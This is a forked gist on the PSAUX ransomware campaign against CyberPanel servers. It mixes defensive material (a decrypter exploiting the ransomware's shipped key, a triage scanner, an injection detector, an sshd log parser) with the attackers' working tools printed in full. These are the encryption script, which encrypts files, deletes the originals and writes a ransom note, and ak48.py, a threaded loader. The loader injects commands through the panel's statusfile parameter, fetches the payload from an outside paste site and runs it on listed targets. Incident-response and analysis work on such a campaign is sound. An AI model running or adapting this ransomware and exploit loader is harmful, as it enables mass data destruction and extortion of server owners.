@saurindashadia
Forked from gboddin/00-README.md
Created November 6, 2024 03:27
cyberpanel 0day leaked attack script

CyberPanel PSAUX attack/defense

WARNING: Please use good judgement and extra caution before downloading and running something provided in the comment section of this gist.

This repo contains 2 things:

  • A decryption script
  • A list of files found on the threat-actor's server

Ransomware status

We are currently aware of 3 separate groups encrypting CyberPanel instances. The extensions they leave are:

  • .psaux -> Custom ransomware, script based
  • .encryp -> Variant from Babuk's source
  • .locked -> C3RB3R Conti v3-based Ransomware

Decryption

If your server was only targeted by PSAUX and your files have the .psaux extension, you should be able to use the decrypter 1-decrypt.sh, thanks to a flaw in PSAUX's implementation.

If your server was only targeted by the .encryp ransomware, you can use encryp_dec.out provided by v0idxyz.
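Before running any decrypter it helps to know which of the three groups hit the box and whether the PSAUX key files survived. The triage scanner below is an added example, not part of this gist: it walks a directory tree (a live root or a mounted image passed as the root argument), counts files carrying the three extensions listed above, checks for the files the PSAUX script drops under /var (paths taken from the scripts in this gist, including the /var/actually.sh the loader fetches), and looks for the PSAUX banner in /etc/motd. The root argument, the report layout and the sample tree in the usage are the example's own.

```python
import json
import os
import sys
from pathlib import Path

# Extensions left by the three groups described above, mapped to the labels this gist gives them.
RANSOM_EXTENSIONS = {
    ".psaux": "PSAUX (custom, script based)",
    ".encryp": "Babuk-derived",
    ".locked": "C3RB3R (Conti v3-based)",
}

# Files the PSAUX script and its loader leave on the host (paths from the scripts in this gist),
# written relative to the scanned root so the scan also works on a mounted disk image.
PSAUX_ARTIFACTS = [
    "var/key.enc",
    "var/iv.enc",
    "var/private.pem",
    "var/decrypter.sh",
    "var/index_template.html",
    "var/actually.sh",
]
MOTD_MARKER = "PSAUX"


def triage(root):
    """Walk `root` and collect ransomware indicators. Returns a plain dict for reporting."""
    root = Path(root)
    counts = {ext: 0 for ext in RANSOM_EXTENSIONS}
    samples = {ext: [] for ext in RANSOM_EXTENSIONS}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            suffix = Path(name).suffix
            if suffix in counts:
                counts[suffix] += 1
                if len(samples[suffix]) < 5:  # keep a few examples per family for the report
                    samples[suffix].append(str(Path(dirpath) / name))
    artifacts = [a for a in PSAUX_ARTIFACTS if (root / a).is_file()]
    motd = root / "etc" / "motd"
    motd_hit = False
    if motd.is_file():
        try:
            motd_hit = MOTD_MARKER in motd.read_text(errors="replace")
        except OSError:
            motd_hit = False
    groups = [RANSOM_EXTENSIONS[ext] for ext, n in counts.items() if n]
    # 1-decrypt.sh needs both wrapped secrets; without them the PSAUX files cannot be recovered this way.
    key_files_present = counts[".psaux"] > 0 and all(
        a in artifacts for a in ("var/key.enc", "var/iv.enc")
    )
    return {
        "counts": counts,
        "samples": samples,
        "groups": groups,
        "artifacts": artifacts,
        "motd_marker": motd_hit,
        "psaux_key_files_present": key_files_present,
    }


if __name__ == "__main__":
    # Usage: python3 psaux_triage.py /path/to/root   (defaults to "/" when run on the affected host)
    print(json.dumps(triage(sys.argv[1] if len(sys.argv) > 1 else "/"), indent=2))
```

Run it against a copy or a mounted image first; it only reads, but the report names paths you will want to preserve before any decrypter deletes the .psaux originals.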

1-decrypt.sh

```bash
#!/bin/bash
######################################################################################
# LeakIX PSAUX CyberPanel Ransom campaign decrypter                                  #
#                                                                                    #
# You have been blessed by PSAUX                                                     #
#                                                                                    #
# All your files can be decrypted.                                                   #
#                                                                                    #
# Telegram: @psauxsec                                                                #
#                                                                                    #
# Fun must be made on that channel for weak crypto,                                  #
#                                                                                    #
# Ransomware Rushed by PSAUX                                                         #
#                                                                                    #
######################################################################################
# WARNING, WE ARE AWARE OF MULTIPLE ENCRYPTION ATTACKS. THIS SCRIPT WORKS WHEN YOUR FILES ARE ENCRYPTED WITH .psaux EXTENSION
# WARNING, ALWAYS WORK ON A COPY OF YOUR DATA, ENCRYPTED OR NOT
# WARNING, THIS SCRIPT WILL RESTORE FILES FROM THE TIME THEY WERE ENCRYPTED, BACKUP ANY CHANGES MADE AFTER THE HACK
### Fail the script if anything's wrong, that's people's data we're dealing with
set -e
echo "Running PSAUX CyberPanel decrypter..."
### Master key gently provided by PSAUX
### The ransomware wraps its AES key and IV with the RSA key it ships with, so the same
### private key unwraps them. The key material is elided in this copy of the gist.
MASTER_KEY="-----BEGIN PRIVATE KEY-----<PRIVATE KEY ELIDED>-----END PRIVATE KEY-----"
MASTER_KEY_PATH="/tmp/private.pem"
umask 077   # keep the key and the recovered secrets readable by this user only
echo "$MASTER_KEY" > "$MASTER_KEY_PATH"
# Decrypt the AES key and IV the ransomware left in /var with the master key
openssl pkeyutl -decrypt -inkey "$MASTER_KEY_PATH" -in /var/key.enc -out /tmp/key.enc
openssl pkeyutl -decrypt -inkey "$MASTER_KEY_PATH" -in /var/iv.enc -out /tmp/iv.enc
local_key=$(xxd -p /tmp/key.enc | tr -d '\n')
local_iv=$(xxd -p /tmp/iv.enc | tr -d '\n')
echo "Recovered key: $local_key IV: $local_iv"
# Find all .psaux files and decrypt them; -print0 / read -d '' copes with spaces and newlines in names
find / -name "*.psaux" -type f -print0 | while IFS= read -r -d '' file; do
    if openssl enc -aes-128-cbc -d -K "${local_key}" -iv "${local_iv}" -in "${file}" -out "${file%.psaux}"; then
        rm "${file}"
        echo "Restored ${file%.psaux}"
    else
        # Leave the encrypted copy in place so a failed decrypt never destroys data
        echo "FAILED to decrypt ${file}, leaving it in place" >&2
    fi
done
```
Encryption script left by the attackers (the file the loader below fetches to /var/actually.sh)

```bash
#!/usr/bin/env bash
private="-----BEGIN PRIVATE KEY-----<PRIVATE KEY ELIDED>-----END PRIVATE KEY-----"
echo "$private" > /var/private.pem
key_name="s2zp8fks9a0L"
echo "Encryption ID: ${key_name}"
PRIVATE_KEY_PATH="/var/private.pem"
if [ ! -f "$PRIVATE_KEY_PATH" ]; then
    echo "Private key not found at $PRIVATE_KEY_PATH"
    exit 1
fi
PRIVATE_KEY=$(cat $PRIVATE_KEY_PATH)
if [ -z "$PRIVATE_KEY" ]; then
    echo "Could not read the private key (maybe permission issue?)"
    exit 1
fi
echo "Private Key SSL: $(echo "$PRIVATE_KEY" | head -n 1)..."
login_message="
######################################################################################
# Encryptions ID : ${key_name} #
# You have been hacked by PSAUX #
# #
# All your files have been encrypted. #
# #
# To restore access, you can contact us in Telegram #
# #
# Telegram: @psauxsec #
# #
# Payment must be made in cryptocurrency. #
# #
# The price for decryption is 200 dollars. #
# Sample decryption can be served upon request. #
# #
# After payment, you will receive a key to run the decrypter script #
# on your system to restore your files. #
# All your database is downloaded and if you are not going to pay in next 3 days #
# its going to be published in darknet. Best Regards! #
# #
# #
# #
# Ransomware Made by PSAUX #
# #
######################################################################################
"
echo "$login_message" > /etc/motd
key=$(openssl rand -hex 16)
iv=$(openssl rand -hex 16)
echo "Generated key: ${key}"
echo "Generated IV: ${iv}"
echo -n $key | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/key.enc
if [ $? -eq 0 ]; then
    echo "Key encrypted successfully: /var/key.enc"
else
    echo "Error with key encryption"
    exit 1
fi
echo -n $iv | xxd -r -p | openssl pkeyutl -encrypt -inkey $PRIVATE_KEY_PATH -out /var/iv.enc
if [ $? -eq 0 ]; then
    echo "IV encrypted successfully: /var/iv.enc"
else
    echo "Error with IV encryption"
    exit 1
fi
excluded_dirs=(
    "/proc"
    "/sys"
    "/dev"
    "/run"
    "/etc"
    "/usr"
    "/tmp"
    "/var/run"
    "/var/lock"
    "/var/tmp"
    "/mnt"
    "/sbin"
    "/lib64"
    "/bin"
    "/boot"
    "/lib"
    "/lib32"
    "/srv"
    "/libx32"
    "/media"
    "/lost+found"
)
excluded_files=(
    "/var/key.enc"
    "/var/iv.enc"
    "/var/decrypter.sh"
    "/var/index_template.html"
)
is_excluded() {
    local path=$1
    for excluded in "${excluded_dirs[@]}"; do
        if [[ "$path" == "$excluded"* ]]; then
            return 0
        fi
    done
    for excluded in "${excluded_files[@]}"; do
        if [[ "$path" == "$excluded" ]]; then
            return 0
        fi
    done
    return 1
}
encrypt_directory() {
    local dir=$1
    echo "Encrypting directory: $dir"
    find "$dir" -type f -print0 | while IFS= read -r -d '' file; do
        if ! is_excluded "$file"; then
            echo "Encrypting file: $file"
            openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
            if [ $? -eq 0 ]; then
                echo "[+] : ${file}.psaux"
                rm -f "$file"
            else
                echo "Error encrypting: $file"
            fi
        else
            echo "Excluded file: $file"
        fi
    done
}
encrypt_directory "/"
find / -type d \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found \) -prune -o -type d -print0 | while IFS= read -r -d '' dir; do
    if ! is_excluded "$dir"; then
        cp /var/index_template.html "$dir/index.html"
    fi
done
find / -type f \( -path /proc -o -path /sys -o -path /dev -o -path /run -o -path /tmp -o -path /var/run -o -path /var/lock -o -path /var/tmp -o -path /mnt -o -path /media -o -path /lost+found -o -name "*.psaux" -o -name "index.html" -o -name "decrypter.sh" \) -prune -o -type f -print0 | while IFS= read -r -d '' file; do
    if ! is_excluded "$file"; then
        echo "[+] : $file"
        openssl enc -aes-128-cbc -K "$key" -iv "$iv" -in "$file" -out "${file}.psaux"
        if [ $? -eq 0 ]; then
            echo "[+] : ${file}.psaux"
            rm -f "$file"
        else
            echo "Error encrypting: $file"
        fi
    else
        echo "Excluded file: $file"
    fi
done
rm -- "$0" && exit 0
```
ak48.py (the loader that abuses the panel endpoint and runs the script above)

```python
import httpx
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed


def get_CSRF_token(client):
    try:
        resp = client.get("/")
        if resp.status_code == 200:
            return resp.cookies.get('csrftoken')
        else:
            print(f"Failed to connect to {client.base_url}. Status code: {resp.status_code}")
            return None
    except httpx.RequestError:
        print(f"Failed to connect to {client.base_url}")
        return None


def pwn(client, CSRF_token, cmd):
    if not CSRF_token:
        return "No CSRF token"
    headers = {
        "X-CSRFToken": CSRF_token,
        "Content-Type": "application/json",
        "Referer": str(client.base_url)
    }
    payload = '{"statusfile":"/dev/null; %s; #","csrftoken":"%s"}' % (cmd, CSRF_token)
    try:
        response = client.put("/dataBases/upgrademysqlstatus", headers=headers, data=payload)
        if response.headers.get("Content-Type", "").startswith("application/json"):
            return response.json().get("requestStatus", "No response")
        else:
            print(f"Unexpected response type from {client.base_url}: {response.text}")
            return "Unexpected response"
    except httpx.RequestError:
        return "Failed to execute"


def execute_command(client, command):
    CSRF_token = get_CSRF_token(client)
    if not CSRF_token:
        print(f"Could not retrieve CSRF token from {client.base_url}")
        return "Failed to retrieve CSRF token"
    print(f"Executing: {command} on {client.base_url}")
    stdout = pwn(client, CSRF_token, command)
    print(stdout)
    return stdout


def process_target(target):
    print(f"Processing target: {target}")
    try:
        client = httpx.Client(base_url=target, verify=False, timeout=5.0)
        # Step 1: Download the file
        if "Failed" in execute_command(client, "curl -L https://www.paste.tc/raw/asd-41506 -o /var/actually.sh"):
            return
        # Step 2: Check if the file exists, retry if necessary
        file_exists = False
        while not file_exists:
            response = execute_command(client, "ls /var/actually.sh")
            if "No such file or directory" not in response:
                file_exists = True
                print("File found. Proceeding with further steps...")
            else:
                print("File not found. Waiting for the download to complete...")
                time.sleep(2)  # Wait for 2 seconds before checking again
        # Step 3: Change permissions for the downloaded file
        execute_command(client, "chmod +x /var/actually.sh")
        # Step 4: Remove any carriage return issues
        execute_command(client, "sed -i 's/\r//g' /var/actually.sh")
        # Step 5: Execute the script with nohup to detach and log to /dev/null
        execute_command(client, "nohup /var/actually.sh")
        print("Script executed and detached.")
    except httpx.RequestError as e:
        print(f"Could not connect to {target}. Error: {str(e)}")


def main(targets_file, max_threads=5):
    try:
        with open(targets_file, "r") as file:
            targets = [line.strip() for line in file if line.strip()]
        with ThreadPoolExecutor(max_threads) as executor:
            future_to_target = {executor.submit(process_target, target): target for target in targets}
            for future in as_completed(future_to_target):
                target = future_to_target[future]
                try:
                    future.result()
                except Exception as exc:
                    print(f"{target} generated an exception: {exc}")
    except FileNotFoundError:
        print(f"Error: File {targets_file} not found.")
        sys.exit(1)


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 ak48.py targets.txt [max_threads]")
        sys.exit(1)
    targets_file = sys.argv[1]
    max_threads = int(sys.argv[2]) if len(sys.argv) > 2 else 5
    main(targets_file, max_threads)
```
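The loader above gets code execution through one parameter: a PUT to /dataBases/upgrademysqlstatus whose JSON `statusfile` value is "/dev/null; <command>; #" instead of a path. The check below is an added defensive example, not code from this gist: it inspects captured requests (proxy or WAF logs with bodies, or a pcap export) and flags that endpoint when `statusfile` carries shell metacharacters or is not a plain absolute path. The endpoint name and payload shape are those in ak48.py; the sample captures, the benign status path and the token values are constructed placeholders, and the "absolute path" rule is an assumption about what a legitimate value looks like. It complements, not replaces, patching the panel.

```python
import json
import re

# Endpoint and parameter abused by ak48.py above.
TARGET_PATH = "/dataBases/upgrademysqlstatus"
TARGET_PARAM = "statusfile"

# Characters that never belong in a status-file path but do appear in shell injection
# (command separators, pipes, substitution, redirection, comment markers, line breaks).
SHELL_META = re.compile(r"[;&|`$<>\n\r#]")


def inspect_request(method, path, body):
    """Return a list of findings for one captured request; an empty list means no concern."""
    if path.rstrip("/") != TARGET_PATH or method.upper() != "PUT":
        return []
    try:
        data = json.loads(body) if body else {}
    except json.JSONDecodeError:
        return ["non-JSON body sent to %s" % TARGET_PATH]
    if not isinstance(data, dict):
        return ["JSON body to %s is not an object" % TARGET_PATH]
    value = data.get(TARGET_PARAM)
    if value is None:
        return []
    if not isinstance(value, str):
        return ["%s is not a string: %r" % (TARGET_PARAM, value)]
    findings = []
    if SHELL_META.search(value):
        findings.append("shell metacharacters in %s: %r" % (TARGET_PARAM, value))
    elif not value.startswith("/"):
        # Assumption for this example: a legitimate status file is referenced by absolute path.
        findings.append("%s is not an absolute path: %r" % (TARGET_PARAM, value))
    return findings


def scan_captures(captures):
    """Run inspect_request over (method, path, body) tuples and return the flagged ones with their index."""
    hits = []
    for idx, (method, path, body) in enumerate(captures):
        findings = inspect_request(method, path, body)
        if findings:
            hits.append({"index": idx, "method": method, "path": path, "findings": findings})
    return hits


# Constructed sample captures (not real traffic). The status path and csrftoken values are placeholders.
SAMPLE_CAPTURES = [
    ("GET", "/", ""),
    ("PUT", TARGET_PATH, '{"statusfile":"/home/cyberpanel/mysqlUpgradeStatus","csrftoken":"PLACEHOLDER"}'),
    ("PUT", TARGET_PATH, '{"statusfile":"/dev/null; id; #","csrftoken":"PLACEHOLDER"}'),
    ("PUT", TARGET_PATH, '{"statusfile":"../../etc/passwd","csrftoken":"PLACEHOLDER"}'),
    ("PUT", TARGET_PATH, 'statusfile=/dev/null'),
]

if __name__ == "__main__":
    for hit in scan_captures(SAMPLE_CAPTURES):
        print("capture %d: %s %s -> %s" % (hit["index"], hit["method"], hit["path"], "; ".join(hit["findings"])))
```

Access logs alone will not show the body, so the same endpoint is worth alerting on by method and path as well: a burst of PUTs to it from one source, followed by outbound downloads from the panel host, is the sequence the loader produces.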
sshd log excerpt

```text
Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2
```
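The sshd lines above show five password logins as root from one address within a few hours. The helper below is an added example, not from this gist, that parses such "Accepted ... for ... from ..." lines, groups them by source address, and attaches two reasons for attention: any root login by password (which should not be possible on a hardened host at all) and any source outside an allow-list. The five lines from the gist are embedded as sample input together with one constructed benign line (user deploy, address 203.0.113.10, key-based); the allow-list is an assumption for the example.

```python
import re
from collections import OrderedDict

# Matches the syslog-style line sshd writes on every successful authentication.
SSHD_ACCEPT = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d{2}:\d{2}:\d{2}) (?P<host>\S+) sshd\[(?P<pid>\d+)\]: "
    r"Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)

# Sources you expect interactive logins from; an assumption for this example.
ALLOWED_SOURCES = {"203.0.113.10"}


def parse_accepted_logins(lines):
    """Return one dict per 'Accepted ...' line; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = SSHD_ACCEPT.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def summarize_logins(lines, allowed=ALLOWED_SOURCES):
    """Group accepted logins by source address (in file order) and record why each source matters."""
    summary = OrderedDict()
    for ev in parse_accepted_logins(lines):
        entry = summary.setdefault(ev["ip"], {
            "count": 0, "users": set(), "methods": set(),
            "first": ev["ts"], "last": ev["ts"], "reasons": [],
        })
        entry["count"] += 1
        entry["users"].add(ev["user"])
        entry["methods"].add(ev["method"])
        entry["last"] = ev["ts"]  # lines are assumed to be in chronological order
        if ev["user"] == "root" and ev["method"] == "password" \
                and "root password login" not in entry["reasons"]:
            entry["reasons"].append("root password login")
    for ip, entry in summary.items():
        if ip not in allowed:
            entry["reasons"].append("source not in allow-list")
    return summary


# Sample input: the five lines from the gist plus one constructed benign line.
SAMPLE_LOG = """\
Oct 29 09:10:11 ready sshd[2290000]: Accepted publickey for deploy from 203.0.113.10 port 51234 ssh2
Oct 29 12:01:15 ready sshd[2293619]: Accepted password for root from 188.119.27.24 port 31771 ssh2
Oct 29 12:35:48 ready sshd[2294265]: Accepted password for root from 188.119.27.24 port 30923 ssh2
Oct 29 13:25:23 ready sshd[2294914]: Accepted password for root from 188.119.27.24 port 31508 ssh2
Oct 29 14:04:22 ready sshd[2295536]: Accepted password for root from 188.119.27.24 port 31502 ssh2
Oct 29 14:15:47 ready sshd[2296023]: Accepted password for root from 188.119.27.24 port 31334 ssh2
""".splitlines()

if __name__ == "__main__":
    # Usage: python3 ssh_logins.py < /var/log/auth.log   (falls back to the sample when stdin is a tty)
    import sys
    lines = SAMPLE_LOG if sys.stdin.isatty() else sys.stdin
    for ip, entry in summarize_logins(lines).items():
        if entry["reasons"]:
            print("%s: %d logins as %s, %s .. %s: %s" % (
                ip, entry["count"], ",".join(sorted(entry["users"])),
                entry["first"], entry["last"], "; ".join(entry["reasons"])))
```

On a recovered host the same pass is worth repeating over the whole retention window, since a root password login that precedes the first .psaux timestamp tells you the credentials were already in the attackers' hands before the panel exploit ran, and they need rotating along with the panel fix.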
SSH public key

```text
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAsrBV2UGqNIQ8iL3j3/yh+qi7Q76plJteqTmS2EdQ4A8HR6yckuRnyr5s0UVDI/eiAZpiNKDDpipwULl22Sih96vFOJkKpON5bxQ4NwUFQ7Fq7wheBK9PBQ5owuBrOqIeY3D846kNejNJhDOcIiDYN9KqCeP+EGlKTFb68/nifQkPychx+z4MEm39pB7CKS+EFXsOoCmBntb7wduZf0spLtstd+bTSFxwbdgSNQU2iabazLYG05LQWTc4+Zv574Wt4608PjGE2uyofxO69XFtiYy9LvNtzmLOlJYy89M3HdQgfGzrWVC8QLLsZvuQsrRPDFb4/2/KJ5KyT9rg7qGeQQ== Suphachai
```